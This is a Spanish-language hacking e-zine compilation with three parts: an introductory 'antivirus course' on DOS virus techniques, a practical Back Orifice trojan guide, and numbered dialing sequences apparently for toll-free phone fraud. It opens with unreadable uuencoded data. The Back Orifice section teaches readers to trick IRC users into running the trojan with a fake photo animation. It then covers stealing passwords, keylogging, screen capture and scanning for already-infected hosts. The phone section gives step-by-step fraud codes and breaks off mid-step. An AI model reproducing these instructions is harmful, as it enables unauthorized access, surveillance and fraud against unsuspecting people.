MHOMQ*>QS^![&RNR6Q0!5*4158/2R`*@J@:J*P*HRN*H$D8KN!;*4,UL&I"Q' M->['3*(E>(LINQQ2N:_X$%:Q'.!*Q>M"$^$KX)4\P%(*L2P%64*8Q7*Y\7<( MMCB\5#O'BT&7*-KN5:NQO+2.(A^%,<_>V&XLZ]?%+]?X7=$`G:S2Q1;*AX<] M9AHENF6ERC6R-<[LOX_V1NZK0',TQK?SSDPH+O^W%^]>HVO#_?CH]=L/[V.Z M0(96OG[Y`OT6J2J&F8>&SK-!!KM$ACV>.8=5L7%NK`>7),.3;V&RK^ZUD>FV MT?^C?A,]XDY]X'Z[\_^WYA^M?]8_ZY]O][/F_W_?/VO^_YK_O^;_K_G_:_[_ 8]_FSYO^O^?]K_O_WR___/Q&@"8``L``` ` end sum -r/size 1846/11634 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= CURSO DE ANTIVIRUS ------------------ Primer capitulo: INTRODUCCION ****************************************************************************** Disposicion Legal: El motivo del presente curso es instruir a aquel que lo siga en el conocimiento de las tecnicas usadas para combatir virus, empezando por las mas basicas para acabar en las ultimas novedades. Para ello profundizare en el conocimiento del codigo virico con el unico proposito de poner al lector en disposicion de saber a que nos enfrentamos cuando luchamos contra esta lacra del mundo informatico. La informacion contenida en el curso es informacion tecnica que puede utilizarse en la fabricacion de un virus. De ahi que la responsabilidad unica es del lector, y a su eleccion queda usar bien o mal la informacion aqui relatada. Del mismo modo es su responsabilidad ejecutar cualquier codigo aparecido en el curso en su propio ordenador o en el de terceros, declinando yo toda responsabilidad por los posibles daños causados. Para evitar en la medida de lo posible el uso fraudulento de esta informacion no dare en ningun momento el codigo completo de ningun virus, sino solo rutinas sueltas. De ese modo la confeccion de un virus a partir de las rutina mostradas en el curso es una labor que requiere un esfuerzo por parte del lector y por tanto un delito consciente. > De ahi que yo, el autor, declino toda responsabilidad civil y/o legal > que discurra de la utilizacion fraudulenta de esta informacion. El > responsable unico y ultimo ser el lector si decide usarla para dichos > fines. El autor: Manuel Llorens. ****************************************************************************** He creido conveniente comenzar el curso explicando cada una de las preguntas de la encuesta, dada la variedad de respuestas que he recibido. No me extenderé en aquellas que por su caracter meramente tecnico pertenezcan mas al curso de ASM de Pablo Barron que al presente. Cada uno de los puntos se desarrollar a lo largo del curso alli donde sea conveniente. Aun no he decidido el 'indice' del mismo, que ya incluire en el proximo numero (es por esperar a tener el mayor numero posible de encuestas) > ¿Sabes para lo que sirve una interrupcion? Una interrupcion es el modo que tiene un programa ensamblador de ejecutar servicios y funciones del BIOS (Basic Input Output System, mas conocido como la ROM) y el DOS. La mayoria de los virus 'interceptan' estas interrupciones de modo que cada vez que se ejecuta uno de dichos servicios el virus supervisa lo que esta haciendo el programa que ejecuto la interrupcion, a este proceso se le denomina 'instalar un gestor de interrupcion'. La instruccion ensamblador que ejecuta una interrupcion es int numero_de_la_interrupcion. La direccion de cada gestor de interrupcion (vector de interrupcion) se guarda en una tabla a partir de la direccion 0000:0000, y cada vector ocupa 4 bytes (seg:off). > ¿Sabes instalar un gestor de interrupcion? Pues tan facil como esto: mov ah,25h (servicio establecer vector de interrupcion) mov al,interrupcion_a_capturar (entre 0 y 255) lds dx,gestor_de_interrupcion (direccion de la rutina gestora) int 21h (llama a la interrupcion del DOS) Otro metodo que puede usarse si no se quiere llamar al DOS es el siguiente: xor ax,ax mov ds,ax mov bx,4*interrupcion_a_capturar mov [bx],offset gestor_de_interrupcion mov [bx+2],cs (si el gestor esta en el mismo segmento que el actual) Generalmente es necesario guardar previamente el gestor de interrupcion actual antes de cambiarlo por el nuestro con el fin de volver a instalar en antiguo al salir del programa. Tambien generalmente es necesario que nuestro propio gestor de interrupcion llame al antiguo. Por ejemplo un virus captura la interrupcion 21h (la del DOS) si 'detecta' que el programa que la ejecuto est intentando abrir un fichero (mediante ah=3Dh) lo tratar de infectar y finalmente dejar que el DOS lo abra, llamando al gestor de interrupcion antiguo. Igualmente si la funcion que el programa ejecuta no es util a nuestro virus la dejara pasar al DOS 'intacta'. > ¿Conoces la forma en la que arranca el DOS? El proceso difiere ligeramente segun se arranque desde el HD o desde un disquete, pero basicamente a grandes rasgos es el que sigue: Primero se ejecuta una rutina que reside en el MBR (ver mas abajo) que se encarga de cargar el sector BOOT de la particion activa. Si se esta arrancando desde un disquete el proceso es similar solo que no existe MBR ni tabla de particion, ya que el sector BOOT siempre esta en la misma posicion (el primero del disco). Se ejecuta el codigo contenido en el BOOT. El BOOT carga IO.SYS e MSDOS.SYS a partir de 0070:0000 o presenta un mensaje de error si el disco no era de arranque. A continuacion ejecuta IO.SYS (una rutina contenida en el que se denomina SYSINIT) el cual ejecuta a su vez MSDOS.SYS. Cuando MSDOS.SYS devuelve el control a SYSINIT este carga el CONFIG.SYS lo procesa y al final entrega el control a COMMAND.COM para que cargue el autoexec.bat Este proceso de carga es muy importante dado que si un virus consigue infectar el MBR o el BOOT toma el control del ordenador antes que ningun otro programa. A partir de aqui tendremos en cuenta la siguiente maxima del mundo de los virus: "Toda porcion de codigo ejecutable es susceptible de ser infectada" "Toda porcion de codigo no ejecutable puede ser infectada pero nunca puede dar lugar por si sola a una infeccion" (por ejemplo un mensaje nunca puede dar lugar a una infeccion, aunque si puede haber sido infectado por un virus como modo de guardar en el sus datos). > ¿Sabes lo que es el DTA? Es el Disk Transfer Address. Basicamente es una zona de memoria que se crea al ejecutar cada programa y que sirve para que las funciones del DOS devuelvan informacion al programa a traves de aquellas interrupciones que no piden explicitamente una direccion de memoria. Por ejemplo, cuando leemos un fichero en ASM mediante una interrupcion le pasamos al DOS la direccion de memoria donde queremos que este meta los datos leidos del fichero, pero cuando le pedimos que nos diga que ficheros encuentra que coincidan con '*.COM' la respuesta es enviada al DTA, ya que no le pasamos un direccion. Por defecto se encuentra a partir del byte 80h del comienzo del segmento del programa (ver diferencias entre un COM y un EXE) y es la misma zona que usa el DOS para pasar los parametros de la linea de comandos a un programa por lo que si vamos a usar la DTA deberemos relocalizarla primero fuera de dicha zona o perderemos la informacion sobre dichos parametros. Relocalizarla es tal facil como hacer: mov ah,1ah lds dx,direccion_del_nuevo_dta int 21h Lo normal es que el virus se cree su propio DTA para no interferir con los parametros que se le hayan podido pasar al programa infectado y luego restaura la DTA antes de salir. > ¿Sabes lo que es un MCB? Memory Control Block. Es una zona de memoria que se encuentra justo antes de cada bloque de memoria que reserva el DOS para uso de un programa que indica cu nta memoria se ha reservado, por que programa y cual es el siguiente bloque. De este modo un virus puede reservar memoria para si mismo mediante la modificacion directa de estos MCBs. > ¿Sabes lo que es el MBR? Es el Master Boot Record. Esta presente en el sector 0 de cada disco duro, y contiene ademas de una porcion de codigo ejecutable la tabla de particion. Puede crearse un MBR nuevo mediante la ejecucion de FDISK /MBR, en caso de sospecharse que este pueda haber sido infectado. Algunos discos duros de gran capacidad (>512 megas) instalan en el MBR su propia rutina para poder engañar al DOS y hacerle creer que son menores de lo que realmente son, ya que el DOS no puede trabajar con discos de tamaños >512 megas, de ahi que debemos ser cuidadosos. En cualquier caso, la destruccion del codigo ejecutable del MBR no es demasiado peligrosa, ya que siempre podemos restaurarlo mediante el FDISK o mediante las utilidades que nos entregaron con el HD, pero si es m s peligroso destruir la tabla de particiones, ya que si no recordamos los valores que contiene podriamos perder el acceso al disco duro. > ¿Sabes lo que es un CRC? Ciclyc Redundant Check. Es una forma de comprobar de forma univoca que el contenido de un archivo no ha cambiado, mediante una operacion matem tica que afecta a cada byte del archivo y genera un numero (de generalmente 16 o 32 bytes) para cada archivo. Una vez obtenido este numero las posibilidades de que una modificacion del archivo de el mismo numero son pequeñisimas. De ahi que haya sido un metodo tradicionalmente muy utilizado por los antivirus para comprobar si el programa habia sido modificado por un virus, guardando para cada directorio un archivo con los CRCs de cada archivo del mismo y comprobandolo periodicamente o al ejecutar cada archivo (en caso de un antivirus residente o uno que modifique directamente el ejecutable para que se auto chequee cada vez que se ejecute, lo cual ya no se usa porque daba muchos problemas y falsas alarmas). Otro metodo de comprobar la integridad de un archivo son los checksums o sumas de control que son mucho mas sencillas y rapidas pero de menos fiabilidad. De hecho el metodo de los CRCs es tan potente que muchos antivirus son capaces de reconstruir el archivo antes de ser modificado a partir de la informacion de estos. Esta tecnica a dejado de ser segura debido a la aparicion de virus stealth (invisibles) que son capaces de hacer que un archivo infectado aparezca a los ojos del programa que calcula el CRC como estaba antes de infectarlo (ver m s adelante). > ¿Sabes en que se diferencia un COM de un EXE? La diferencia principal es que un COM solo puede ocupar un segmento 64 K y un EXE puede ocupar toda la memoria por debajo de 1 mega (sin contar que el programa este hecho en modo protegido). Pero para nuestros fines la diferencia principal radica en la forma diferente que tiene el DOS de cargar y ejecutar estos programas. Veamos como carga el DOS un COM o un EXE. Primero se crea un PSP (Program Segment Prefix) que ocupa los 100h primeros bytes del segmento que ocupa el programa. El programa en si se carga a partir de 100h. El PSP guarda alguna informacion sobre el programa que se encuentra justo después de el. Ademas como vimos contiene a la DTA y/o a los par metros (por defecto). Si se trata de un archivo COM el programa comienza a ejecutarse a partir de 100h, si se trata de un EXE el programa se ejecuta a partir de los datos especificados en la cabecera del mismos que son los primeros bytes del archivo ejecutable. No debe confundirse el PSP con la cabecera de un EXE. La cabecera de un EXE son los primeros bytes del archivo y el PSP se crea para cualquier programa ejecutable en la memoria (COMs o EXEs). En realidad existen otros programas ejecutables como son los controladores de dispositivos (Device Drivers) que se instalan en el config.sys o los cero code start, que son archivos que se ejecutan antes de que se haya cargado el dos (IO.SYS y MSDOS.SYS por ejemplo). En un COM por tanto el primer byte del archivo corresponde con el primer byte que se ejecutar , en un EXE en cambio los primeros bytes corresponden a una cabecera que principalmente ofrece informacion sobre el punto de entrada al archivo, es decir, sobre el byte a partir del cual se ejecutara dicho ejecutable. Ademas contiene la tabla de relocalizacion que sirve para cambiar los saltos absolutos (los no relativos) que contiene el EXE de modo que este pueda ejecutarse independientemente de la direccion de memoria donde resida (para la distincion entre saltos absolutos y relativos consultar el curse de ASM de Pablo ;) > ¿Sabes hacer un programa residente? Un programa residente TSR (Terminate and Stay Resident) es un programa que al terminar su ejecucion no libera la memoria que le habia sido asignada por el DOS, pero si devuelve el control a este. Sirven generalmente para instalar rutinas en memoria, en la mayor parte de los casos gestores de interrupcion. Para dejar un programa residente hay dos metodos, el primero es mediante la modificacion de los MCBs y el segundo mediante una llamada al DOS: mov ah,31h mov al,error_level mov dx,tamaño_de_la_porcion_residente a partir del PSP) xor dx,4 (para pasar dx a p rrafos) add dx,16 (para reservar espacio para los 100h bytes del PSP) int 21h Para conocer el tamaño de la porcion residente lo mas conveniente es poner una etiqueta donde comienza y otra donde acaba y hacer la resta de ambas. > ¿Sabes programar un tracer (paso a paso)? Un tracer es un rutina que pone la CPU en modo paso a paso es decir, que cada vez ejecute una instruccion llamara a la int 1h. Existen diversas tecnicas usadas por los virus y otros programas para evitar que un tracer explore su codigo (armouring). Para evitar esto ultimo hay que programar con mucho cuidado de modo que cada vez que se ejecuta una instruccion miremos a la siguiente para ver si se trata de una instruccion capciosa aunque es un proceso laborioso y dificil... en general el procedimiento consiste en instalar un gestor de la interrupcion 1 y activar el flag de paso a paso: pushf pop ax or ax,100h push ax popf Un tracer es muy util cuando queremos supervisar la ejecucion de un programa de forma autom tica. Los virus usan esta técnica para labores de tunneling (ver m s adelante). > ¿Sabes usar algun debugger? Un debugger es como un tracer pero con control en tiempo real por parte del usuario. Es muy recomendable tener uno a mano para pillar los bugs que derivan de la programacion de antivirus ;) > ¿Sabes la diferencia entre un virus y un troyano? Un virus es una porcion de codigo ejecutable que se añade a otra ya existente. Los virus se ejecutan sin intencion por parte del usuario, que no sabe que el programa en cuestion contiene un virus. Un troyano es un programa con entidad propia que generalmente se construye para labores destructivas. Es el usuario el que confiando en el programa lo ejecuta creyendo que se trata de un programa de algun otro tipo. > ¿Sabes como se produce la infeccion de un archivo? El virus modifica el programa a infectar de tal modo que se ejecute su codigo en vez del codigo del programa original. Salvo los virus de enlace todos los virus necesitan modificar el programa original. > ¿Sabes lo que es un virus 'stealth'? Es un virus que mediante algunas técnicas consigue ocultar su existencia a los antivirus y en general al DOS. Para ello necesita estar residente antes que los antivirus. Modifica la informacion que los antivirus obtiene de modo que parezca que el archivo es normal. Para ello existen diversos métodos, ya que son diversos los métodos que el DOS usa para manejar archivos. Principalmente son el trabajo fisico con el disco (a base de leer sectores), los FCBs (método obsoleto), y la apertura del archivo mediante handles (método vigente). > ¿Sabes lo que es un 'handle stealth'? Es un virus que utiliza técnicas stealth de modo que cada vez que un programa abre un handle para leer/escribir un archivo, modifica los datos del handle para que parezca que el programa es normal. Es decir, aunque el programa sigue estando infectado no es posible ver el verdadero programa sino solo la copia sin infectar que nos muestra el virus. > ¿Sabes lo que es un 'infector/disinfector'? Es justo la técnica contraria, cuando el virus advierte que se est abriendo un programa infectado lo desinfecta y solo vuelva a infectarlo cuando el archivo es cerrado. Es un método m s sencillo de implementar que el 'handle stealth'. > ¿Sabes lo que es un virus con 'tunneling? Cuando un antivirus queda residente instala sus propios gestores de interrupcion para interrupciones que puedan serle utiles a un virus. De ese modo puede dar la alarma cuando un virus efectue una operacion extraña a través de una de estas interrupciones. Un virus con tunneling intenta averiguar la direccion de los gestores de interrupcion del DOS antes de que quedara residente el antivirus. Esto es posible porque como dijimos con anterioridad, el antivirus tiene que devolver el control a los gestores del DOS en algun momento para permitir que el DOS haga su trabajo. Las técnicas principalmente son dos: hacer un tracing, o buscar saltos a lo largo del codigo del gestor del antivirus que salten al DOS. Para ello necesitan conocer el segmento del DOS, lo cual se hace a través de una interrupcion indocumentada del DOS. En realidad son métodos poco fiables dado que son bastante evidentes y a veces condenados al fracaso. Muchos antivirus residentes averiguan que un virus les est haciendo un tunneling y lo detiene. Cuando desarrolle el tema expondré algunas técnicas que he descubierto hace poco, que subsanan la mayoria de los problemas de los tunneling tradicionales. Aunque hasta la fecha ningun virus las incorpora, es bueno anticiparse a los fallos del DOS y taparlos antes de que esto ocurra, de ahi mi interés por esta técnica ;) Otras técnicas se basan en el acceso al disco directamente a través de los puertos, es decir sin necesidad de llamar a ninguna interrupcion. Este método presenta el inconveniente de que no siempre funciona, por lo que es poco probable que un virus lo incorpore. > ¿Sabes lo que es un virus polimorfico? Es un virus que modifica su apariencia en cada infeccion. Esto lo consigue encript ndose con una clave diferente en cada copia que hace de si mismo. Esto dificulta mucho las labores de busqueda de cadenas por parte de los antivirus, que solo pueden fijarse en las rutinas de desencriptacion o utilizar técnicas de otro tipo. Para dificultar aun m s la busqueda de cadenas un virus realmente polimorfico debe variar también la apariencia de su rutina de desencriptacion, mediante la insercion de NOPs aleatorios (instruccion ASM que no hace nada) y mediante la utilizacion de distintos registros y loops para realizar la desencriptacion. Se ha popularizado para este fin la realizacion de motores de encriptacion que son rutinas que desarrollan estas técnicas de un modo general y que se añaden a un virus ya completo que no incluia polimorfismo. > ¿Sabes lo que es un virus con 'armouring'? Es un virus que utiliza técnicas para dificultar ser desensamblado o traceado. No tienen otro fin que este, pero dado que generalmente cuesta muy poco realizarlas es bastante popular que un virus las incluya, aunque también pueden dar lugar a que un antivirus heuristico lo detecte. Ultimamente también se han popularizado técnicas de armouring que actuan contra un antivirus especifico, evitando las combinaciones de bytes que se conoce que activan la alarma heuristica o desactivando el antivirus residente en memoria (mal llamado tunneling). > ¿Has hecho alguna vez un virus? Hacer un virus es una cosa divertida, con la cual se aprende mucho, pero que est penada por la ley. Es mejor combatir esta lacra estudiando a fondo sus técnicas y evit ndolas, intentando siempre ir un paso por delante de los desarrolladores de virus. > ¿Sabes infectar COMs? La infeccion de un COM se hace generalmente modificando los primeros bytes de modo que la ejecucion comience por la rutina virica que se añade al programa original a partir de su fin (virus appending). Después de la ejecucion del virus se restaura en memoria los 3 primeros bytes del archivo original y se le ejecuta. De este modo el usuario no nota que el programa est infectado. Otro método cada vez m s en desuso es el de sobreescribir el codigo original del programa (virus overwritting). De este modo el programa original no puede ser ejecutado y el virus se delata con facilidad. Por supuesto puede insertarse el codigo del virus al principio, pero es una técnica que no se usa demasiado. > ¿Sabes infectar EXEs? La infeccion de un EXE por el contrario no precisa de la modificacion del programa original. Se añade el codigo al final y se modifica la cabecera del EXE de tal modo que el punto de entrada cambie a la rutina virica, que después cede el control al punto de entrada original. También se usan técnicas como insertar el codigo del virus en el stack del EXE (zona 'hueca' que puede o no estar presente en el archivo). > ¿Sabes lo que es un virus de enlace? Es una modalidad de virus que no precisa modificar el archivo que infecta. Para ello lo que hace es modificar la FAT de modo que el comienzo del archivo siempre apunte a un sector que contiene el virus. Se ejecuta este y carga el programa original. No son muy populares dado que precisan de un mayor trabajo y no son en general f ciles de detectar. > ¿Sabes como funciona una busqueda heuristica? Ya la he mencionado numerosas veces en el texto. Es una técnica antivirus que evita la busqueda de cadenas. Para ello lo que hace es desensamblar el programa y ejecutarlo paso a paso, a veces mediante la propia CPU, a veces mediante una emulacion. De ese modo averigua qué hace exactamente el programa en estudio e informa al usuario. Generalmente es dificil de implementar de un modo autom tica ya que se desconoce el conocimiento del usuario. Esto da lugar a un compromiso entre potencia del método y falsas alarmas. En general es una buena técnica si se implementa bien y el usuario tiene un alto conocimiento técnico. La mayoria de los virus nuevos evitan directamente la busqueda heuristica modificando los algoritmos hasta que el programa antivirus no es capaz de indentificarlos. Bueno pues esto es todo por hoy. No es que vay is a aprender nada nuevo pero quedan sentados unos conocimientos b sicos y un lenguaje a utilizar en el resto del curso. Preguntas... ya sabéis las que quer is ;) Existen muchos puntos que no est n suficientemente detallados, cuando sea necesario desarrollaré cada uno, asi que no me preguntéis sobre eso a raiz de esta introduccion, esperad a que llegue a ese capitulo ;) Patuel. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Back Orifice Redactora jefe: Barbwired aenimamadrid@geocities.com Colaboradores: FREEDOM Este texto pretende explicar de forma clara y concisa el uso del BO en w95 y las posibles aplicaciones que se le pueden dar en IRC. De ningun modo se pretende incitar a la ilegalidad y este documento se redacta con fines educativos, para la investigacion y prevencion del ataque. 0 - ¿Que es el BO? Se trata de un troyano que se aprovecha vilmente de los bugs de seguridad de w95/98. NO tengo constancia de su funcionamiento en NT. Quien consiga colarle el bo a un incauto, tendra acceso a todo su sistema: Disco duro, cdrom, disketera, y por supuesto a sus archivos y directorios, pudiendo borrarlos o modificarlos, bajarlos a su propio disco duro... (No seamos malos). 1 - ¿Donde conseguir este magnifico exploit? BO se puede conseguir en las siguientes direcciones: www.members.xoom.com/lynx/ en la zona de download (descarga). http://www.cultdeadcow.com/ Para una mayor informacion se recomienda visitar: www.rootshell.com/ 2 - Ya tengo el Bo.zip, ¿Que contiene? El bo.zip o bo120.zip consta de una serie de archivos: bo.txt Oscuro documento explicativo. No se entiende mucho. plugin.txt Traducido en el epigrafe Apendice de este doc. boserve.exe El servidor autoinstalable del BO bogui.exe Cliente gui del BO boclient.exe Cliente en modo texto del BO boconfig.exe Utilidad de configuracion y plugin del server de BO melt.exe Descompresor de archivos comprimidos con el comando freeze freeze.exe Compresor de archivos. SE pueden descomprimir con melt. 3 - ¿Que hacer con todos estos archivos? Para que todo funcione correctamente debes saber que BAJO NINGUN CONCEPTO debes ejecutar boserve.exe, pues te haria sensible al ataque. Lo primero que hay que hacer es averiguar la ip del pardillo. Despues hay que meterle como sea el archivo boserve.exe. Y conseguir que lo ejecute. Aqui entra en juego la imaginacion de cada uno. El campo ideal de accion es el IRC. Aqui los pobres chateros de a pie hablan a sus anchas, desconocedores del peligro que les acecha. 4- ¿Como le meto el BO al pardillo? Hay que elegir una vicima que trabaje bajo windows. Todos sabemos que eso es facil de averiguar en IRC. Truco facil y muy visto, por tanto poco efectivo: renombrar boserve.exe a fotos.exe. Si ya tienes algo de confianza con la victima en cuestion lo aceptara sin mayores problemas. Para gente mas desconfiada, intenta colarselo despues de hacerte tu el desconfiado: En el canal #intercambio_de_fotos_guarras_muy_fuertes: Elite: ¿Que tienes para cambiar? Pardillo: un par de fotos de Barbwired, que esta tremenda. E: Pero estas seguro de que es Barb de verdad?, que si no no te mando nada, que ya me la han querido liar... P: De verdad, que me las acabo de bajar de Playboy! E: Vale, pues te mando yo una de Barbwired que tb esta muy buena. P: Anda! Barbwired, a mi me pone toda la pila... Uf!!! ... etc, etc, etc.... Y luego le dices que tienes un ejecutable, que es una animacion de Barbwired con su novia (todos sabemos que Barb es bisexual). XDDD Asi te llevas por el morro unas cuantas fotos de Barbwired y encima le cuelas el boserve.exe. Cuando nuestro amigo Pardillo ejecute la animacion y vea que no sale Barb por ningun lado se va a coger un cabreo de narices, y con razon. Te disculpas como buenamente puedas y le dices que el fichero esta defectuoso y que te lo vas a volver a bajar. Lo que te apetezca, pero queda bien con el tio, para que no se corra la voz y sigan confiando en ti y en tus fotos guarras. Es conveniente hacerselo a varios a la vez en privado, para tener un buen numero de victimas. Con la excusa de volvertelo a bajar, te sales de Irc. Vuelves a entrar con otro nick y a trabajar. 5 - ¿Como accedo al ordenador del Pardillo? Pasos a seguir: a) Copiar boclient.exe en tu directorio raiz, c:\ b) Abrir una ventana de msdos en w95 c) Resolver la ip de la victima. Facil de hacer en IRC. Si quieres le das conversacion para que no se vaya. d) En la ventana de msdos, desde la linea de comandos ejecutar boclient.exe a continuacion teclea host "IPdelPardillo", sin comillas. e) En teoria ya estas dentro. 6 - ¿Que puedo hacer una vez dentro? Puedes hacer maravillas. Pero por algo hay que empezar: Desde bo tecleas dir. Te mostrara los archivos de su HD. Si tecleas passes te saldran cosas interesantes, osea, algunas passwords. Puedes teclear cd directorio para explorar. Como en MsDos. Facil. Cosas bonitas para "perfeccionistas" Puedes abrirle el puerto http y ver su disco duro comodamente con tu navegador (A ver si soy capaz de hacerme entender): Una vez dentro tienes que teclear httpon 80, o sea activar el http y el puerto. Si por ejemplo tiene conectado el http con otra cosa, se lo cierras primero con httpoff y el puerto que tenga abierto. Pero, ¿como sabes el puerto que tiene abierto? ¿un scaneado? Ejecutas el httpon y te dice el estado del http y el puerto es decir, le cierras los puertos que tenga abiertos y luego le abres el 80. Mas comandos (traducido de la documentacion que acompaña al BO): Recuerda que en todo momento hablamos del cliente de texto, el boclient.exe. appadd Lanza una aplicacion de texto en un puerto tcp. Para controlar una aplicacion dos o de texto (como el command.com) via telnet. appdel evita que una aplicacion oiga las conexiones. applist Da un listado de las aplicaciones que escuchan la conexion en ese momento. md Crea un directorio. dir muestra los archivos y directorios. rd Borra un directorio. shareadd Crea un export en el servidor. sharedel Borra un export. copy Copia archivos. del Borra archivos. find Busca en el arbol los archivos. freeze Comprime un archivo melt Descomprime un archivo comprimido con freeze. view Visor del contenido de un archivo. httpoff Cierra el servidor http. httpon Abre el servidor http. keylog Logea las teclas que se aprietan en el servidor (victima) a un archivo de texto. El log muestra el nombre de la ventana en que se tecleo el texto. keylog stopend Acaba el log de teclado. capavi Captura video y audio de un dispositivo a un archivo .avi capscreen Captura una imagen de la pantalla del server a formato .bmp listcaps da un listado de los dispositivos de entrada de video. sound ejecuta un archivo de sonido en el servidor (Te lo imaginas?). netlist Listado de las conexiones de red. netdisconnect Desconecta el servidor de una red. netconnect Conecta el servidor a una red. netview Ve todas las interfaces de red, servidores, dominios . ping Hace ping al host. Da el nombre del host y la version del vo. pluginexec Ejecuta un plugin para BO. pluginkill Cierra el plugin. pluginlist Da un listado de los plugin activos. prockill Finaliza un proceso. proclist Listado de los procesos en curso. procspawn Ejecuta un programa. rediradd Redirecciona los paquetes ip entrantes a otra ip redirdel Para el redireccionamiento. redirlist Listado de puertos de rediccionamiento activos regmakekey Crea una entrada en el registro regdelkey Borra una entrada en el registro. regdelval Borra un valor del registro. reglistkeys Listado sub llaves de una llave del registro reglistvals Listado de los valores de una llave del registro regsetval establece el valor de una llave del registro resolve resuelve la direccion ip del server dialog Crea un cuadro de dialogo con el texto que quieras y el boton ok info Da la informacion completa del server lockup cierra el server passes Muestra las contraseñas del usuario actual y la del salvapantallas. Pueden contener basura al final. reboot Apaga el server y lo reinicia. XDDD tcprecv Conecta el server a una ip concreta y guarda la data recivida de esa conexion al archivo especificado. tcpsend conecta el server a una ip, manda el contenido del archivo especificado y cierra la conexion Bueno, ya vemos que se pueden hacer maravillas. Ver epigrafe 9. 8 - ¿Me puedo aprovechar del trabajo de otros? Por supuesto. Otros ya han hecho la parte mas dura por ti (colar el troyano). Puedes probar "a ciegas" desde bo cada ip, con el comando host "ip". Si te funciona el comando dir, íííesta infectado!!! O sea, que estas dentro. Parece ser segun http://www.ntbugtraq.com/ que existen por ahi varios detectores de B.O. (entre ellos el BoSniffer.zip) que son en realidad troyanos (con el BOServer + el pluggin SpeakEasy). Este troyano intenta un login en el canal #BO_OWNED de un servidor IRC con un nick aleatorio informando ademAs de la IP del "afortunado galardonado" con el troyano. 9 - ¿Puedo formatearle el Disco Duro? Os pido encarecidamente que no os paseis. No hagais putadas. Robad fotos porno, cread un dir "Pervertido" o "Mehemetidoentuvida". Intentad acceder al cdrom. Ejecutadle un archivo de sonido. Que flipe, pero no abuseis. Si hace un Netstat vera vuestra ip. Y sabeis que con la IP, y la hora en que ocurrio todo, el ISP y Timonica, de la mano como hermanos, os pueden recomendar un bello hotelito... lo de siempre, precaucion. Apendice - ¿Como puedo escribir mi propio plugin para Back Orifice? (Traduccion del original que acompaña al programa) Para escribir tu propio plugin para el Back Orifice, solo tienes que crear una DLL con funciones del tipo: char *YourFunc(int *active, char *args) El comando de ejecucion del plugin te permite especificar una dll y un nombre de funcion del tipo: "dll:_Function". El resto de los parametros son pasados a tu funcion en los args de los parametros. La unica cosa de la que se ocupa tu aplicacion es de monitorizar la int al que apunta el activo. Si ese valor se vuelve 0, el usuario ha pedido que el plugin termine y tu funcion deberia restablecerse en lo mas rapidamente posible en cuanto se cierre todo lo que haga falta ser cerrado. Tu programa puede devolver NULL, o puede devolver a un pointer que apunte a un bufffer estatico que contenga un mensaje de texto que sera ofrecido al usuario. La DLL no se cargara hasta que el texto se copie desde ese buffer. Y eso es todo lo que hay. Nota de los autores: Los acentos se han omitido en aras de la compatibilidad. La traduccion de la documentacion original ha resultado dificultosa y ha originado giros linguisticos imposibles. A aquellos mas familiarizados con textos tecnicos, o que hayan detectado faltas al rigor, se les pide su colaboracion. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <<FuCKiNG TeLMeX>> (Aportacion de Juan Pablo) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Paso 1. Marcar el telΘfono 629-99-10, Paso 2. Cuando suene una Voz ... Paso 3. En seguida Marcar 8019, y Paso 4. Cuando suene un Tono, en seguida... Paso 5. Marcar la Lada del Pais y/o Regi≤n , y por ·ltimo ... Paso 6. Marcar el TelΘfono deseado + el bot≤n con la siguientefigura # (Gato). CASO II Paso 1. Marcar el telΘfono 258-65-01 + el bot≤n con la siguiente figura#(Gato). Paso 2. Cuando suene un Tono , enseguida ... Paso 3. Marcar 02641414866960, despuΘs ... Paso 4. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 5. Marcar el TelΘfono deseado. CASO III Paso 1. Marcar el telΘfono 725-63-99, Paso 2. Cuando suene un Tono ... Paso 3. En seguida Marcar 00. Paso 4. Esperar otro Tono y ... Paso 5. En seguida volver a Marcar 00, despuΘs ... Paso 6. Marcar la Lada del Paφs y/o Regi≤n y por ·ltimo ... Paso 7. Marcar el telΘfono deseado. CASO IV Paso 1. Marcar el telΘfono 258-65-01 + el bot≤n con la siguiente figura# (Gato) . Paso 2. Cuando suene una voz, en seguida Paso 3. Marcar 02641414866960, despuΘs ... Paso 4. Marcar la Lada del Pais y/o Regi≤n y por ·ltimo ... Paso 5. Marcar el TelΘfono deseado. CASO V - A Paso 1. Marcar el telΘfono 420-98-98. Paso 2. Cuando suene un Tono, en seguida Paso 3. Marcar 7676, despuΘs ... Paso 4. Marcar 098 (Lada Internacional) y por ·ltimo ... Paso 5. Marcar el TelΘfono deseado + el bot≤n con la siguiente figura# (Gato). CASO V - B Paso 1. Marcar el telΘfono 420-98-98. Paso 2. Cuando suene un Tono, en seguida Paso 3. Marcar 7676, despuΘs ... Paso 4. Marcar 095 (Lada USA-CANADA) y por ·ltimo ... Paso 5. Marcar el TelΘfono deseado + el bot≤n con la siguiente figura# (Gato). CASO V - C Paso 1. Marcar el telΘfono 420-98-98. Paso 2. Cuando suene un Tono, en seguida Paso 3. Marcar 7676, despuΘs ... Paso 4. Marcar 098 (Lada Nacional) y por ·ltimo ... Paso 5. Marcar el TelΘfono deseado + el bot≤n con la siguiente figura# (Gato). CASO VI Paso 1. Marcar el telΘfono 91-800-01-670. Paso 2. Cuando suene un Tono, en seguida Paso 3. Marcar 94678, Paso 4. Cuando suene un Tono, en seguida Paso 5. Marcar 55, Paso 6. Cuando suene un Tono, en seguida Paso 7. Marcar 98, por ·ltimo ... Paso 8. Marcar el TelΘfono deseado. NOTA IMPORTANTE : Este Caso (VI) S≤lo se aplica en llamadas Internacionales (Europa y el resto del mundo, exceptuando Estados Unidos y Canada). CASO VII Paso 1. Marcar el telΘfono 722-73-56, Paso 2. Espere y cuando suene una Voz ... Paso 3. En seguida Marque 7349, Paso 4. Espere y cuando suene una voz, Paso 5. En seguida Marque 7349, Paso 6. Espere y cuando suene un Tono, Paso 7. En seguida Marque 0 (cero), Paso 8. Espere y cuando suene un Tono, Paso 9. Marque la Lada del Pais y/o Regi≤n , y 